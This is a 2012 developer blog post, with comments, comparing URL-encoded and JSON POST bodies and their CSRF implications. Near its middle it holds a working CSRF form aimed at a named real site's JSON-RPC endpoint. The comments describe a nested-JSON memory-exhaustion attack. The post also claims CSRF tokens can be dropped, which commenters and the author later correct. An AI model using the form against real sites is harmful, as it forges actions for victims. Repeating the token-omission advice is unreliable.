Wednesday, June 6, 2012

x-www-form-urlencoded VS json - Pros and Cons. And Vulns.

In this short post I want to remind you how agile HTTP requests are. By "requests" we all mean GET and POST - these are the majority. POST contains "message", which is encoded in Internet media type etc - on wiki

By default <form method="post"> tag submits request with this header:
Content-Type:application/x-www-form-urlencoded
This is the default encoding format among HTTP requests. It was suffice just a few years ago - when all people have been sending nothing bigger and more complex than  "email=my@mail.com&name=John".

It's 2012 now, web became much more comprehensive, more rich and data sets are huge now. Developers scope related params in hashes/arrays - in a "tricky" way. If you want to have user["email"] on the server side you are supposed to send
<input name="user[email]">

but if you want user[emailS"] - array of emails, you should send
<input name="user[emails][]">

Application accumulates all params one by one and put them in the corresponding variables. This attitude is full of bugs and incompatibilities. Let me give you a hence.



Advantages of using JSON as format of your POST body.
  • jQuery encoding issue:
$.post('', {arr: [ [1,2,1,2] ]})
This code produces
arr[0][]:1
arr[0][]:2
arr[0][]:1
arr[0][]:2
Which is totally different from original array because '0' is a string.
$.post('', {passengers:[{hi:1}, {hi:2}] })
Produces
passengers[0][hi]:1
passengers[1][hi]:2

But supposed to send
passengers[][hi]:1
passengers[][hi]:2

and so on. You have to care about JSON encoding process yourself - jQuery works properly only on small data sets.
  • Default encoded string is longer and also looks ugly and barely readable.  
{"passengers":[{"name":"Egor", "role":"pilot"},{"name":"DHH", "role":"2pilot"}]}

is much nicer than

passengers[][name]=Egor&passengers[][role]=pilot&passengers[][name]=DHH&passengers[][role]=2pilot
  • It's not a new attitude. Cool teams already use it!
Some popular sites which I like and respect are in favor of JSON. Google wallet, Google+, etc

Vulns:
I am very proud of you if your application uses JSON as default data format. But I'm gonna be disappointed if you really think it mitigates CSRF. It does if you have whitelisted Content-Type of all requests to application/json. But if you just decode any input postBody - here is (I found it myself but it's already known) a work around.

Showcase with csrf-ed following - typepad.com

<form method=post enctype="text/plain" action=http://profile.typepad.com/services/json-rpc><input name='{"a' value='":1,"method":"People.Create","params":[{"other_user_id":"6p00d8341c914353ef","ugroup_id":[10]}]}'></form>

Recap:
  • I strongly encourage you to use JSON format in body of POSTs everywhere and get rid of poor URI encoded strings and PHP/Python use Ruby Luke
  • suits if your objects are complicated, contains nested structures.
  • It allows you to send any kind of object e.g. [[1,2],[3,4]] - Array(array,array..) This is just impossible to send in uri-encoded string. 
  • It's not comfortable if you send simple "name=egor&type=lulzsec" since it will look "verbose". 
  • be aware that not all browsers have JSON built-in so far. Use json2/3 library if you want to make it work.
  • used in good libs. http://emberjs.com/ is awesome, Ruby on rails parses JSON body automatically - just send content-type: application/json.
  • different from default format of body doesn't prevent CSRF. You can submit fake JSON and XML using name/value-splitting tricks and enctype=text/plain unless application whitelisted content-type. Authenticity token is MUST have.
  • You CAN omit CSRF tokens with this! Yes, those ugly long useless damn stupid buggy w3c-made-web-insecure tokens. You just need to whitelist Content-Type = application/json. :)
Do you use JSON format in body? Are you happy with that? Welcome to comments!

24 comments:

  1. There are a couple of problems with submitting JSON instead of form encoded data. Firstly it obviously doesn't work without JavaScript, so you need to fall back to form encoded anyway. But the potentially bigger issue is, what's to stop a nefarious individual creating a request like:
    {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: {a: "you're outta ram" }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
    ?
    How much ram will the server have to allocate to represent that object? Doesn't this just make it much easier to DOS a server?

    ReplyDelete
  2. @phpnode of course no! It is out of question, don't warry. Also you can build that much easier with typical string:
    a[a][a][a][a][a][a]...=1 - the same thing. try to put some site down with that

    Most of modern apps will not work w/o JS. So JS is required.

    ReplyDelete
  3. does rails have a built in way to limit the size of the user supplied JSON? in PHP for example you can limit the number of POST params that will be accepted, (and it will instantiate comparatively cheap arrays, not objects) so it mitigates this kind of attack, presumably rails has a similar measure for normal POST params, but does it also cover JSON?

    ReplyDelete
  4. You say of course, I say show me the code :P (seriously, I'm new to rails and I can't find the code that would deal with this, please point me in the right direction)

    ReplyDelete
  5. @Egor Homakov, were you being sarcastic here?

    > @phpnode of course no! It is out of question, don't [worry.]

    ReplyDelete
  6. @anon no, I just meant JSON overflow is not attack we should consider :)

    ReplyDelete
    Replies
    1. That’s what I’m curious about. Why not?

      Delete
    2. @anon every webserver has post_body_size limitations or smth like this - you can't send too much...
      if you have Proof of concept - it will change my mind

      Delete
    3. Python 2.7.3, default recursion limit (1000), builtin json parser

      >>> import json
      >>> with open('payload-N.json') as fh:
      raw = fh.read()
      >>> # Check memory
      >>> parsed = json.loads(raw)
      >>> # Check memory

      http://commondatastorage.googleapis.com/tmp23456754/payload-1.json

      928K expands by ~50M in memory

      http://commondatastorage.googleapis.com/tmp23456754/payload-2.json

      4.6M expands by ~200M in memory

      Delete
    4. Also note that the 4.6M version compresses down to 11K with gzip, which means it takes 55K to hog 1G of memory if server supports Content-Encoding.

      Delete
    5. it looks real. but there should be memory limits for app instance - not only JSON parsing can eat that much of memory... Should be.

      anyay you can do same with urlfrom encoded:
      a[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=1 - and it will take even less efforts

      Delete
  7. with ajax. so-called remote procedure calls will be common; every event will spawn some ajax call. thus each message will be shorter in length. further, apps will be common. www is satans hollow. 5 seconds per click to face ads and bs. boring as hell.

    ReplyDelete
  8. Thanks, this helped me add a point to create a stronger checklist for my RPC handlers :)

    ReplyDelete
    Replies
    1. yes, content type must be checked. typepad is still vulnerable:)

      Delete
  9. This is interesting. But I am not finding an easy means of forcing a form to post its data as json instead of x-www-form-urlencoded. Setting an enctype attribute on the form to 'application/json' seems to have no effect. Is there an easy means of accomplishing this, or does one necessarily have to code up some javascript in order to post data as json?

    ReplyDelete
    Replies
    1. yeah there is no way to send content type json.
      but you can use the trick mentioned above (Showcase with csrf-ed following - typepad.com
      )

      Delete
  10. Just an FYI, Flash allows setting the Content-Type for cross-origin requests as shown here: http://saynotolinux.com/tests/flash-contenttype.html . You still need a CSRF token or custom header even if your endpoint requires a Content-Type of 'application/json'.

    ReplyDelete
    Replies
    1. Yes i mentioned this is not enough.
      Can Flash send X-Requested-With by any chance?

      Delete
    2. > Yes i mentioned this is not enough.

      "You CAN omit CSRF tokens with this! [...] You just need to whitelist Content-Type = application/json." should probably be clarified then

      > Can Flash send X-Requested-With by any chance?

      You used to be able to, but not since 2009 or so ( http://helpx.adobe.com/flash-player/kb/arbitrary-headers-sent-flash-player.html ,) so it'd be fine to require that.

      Honestly though, if you already have CSRF tokens on hand it's probably best to require an 'X-CSRF-Token' header with a token in it. That way, someone has to screw up both restrictions on cross-domain reads and header setting for you to get CSRFed, and I don't trust plugin authors not to screw up header setting again.

      Delete
    3. Oh, sorry, I changed my opinion few months after I published this post (it's 1.5 years old). Yes I fully agree, token (=nonce) is the best way to prove authenticity.

      Delete
  11. Almost every major website prefers x-www-form-urlencoded over json for AJAX requests. What's the likely reason for that ?

    ReplyDelete
    Replies
    1. there's no real reason to use json. It is more handy format, but form-encoded is much more usual.

      Delete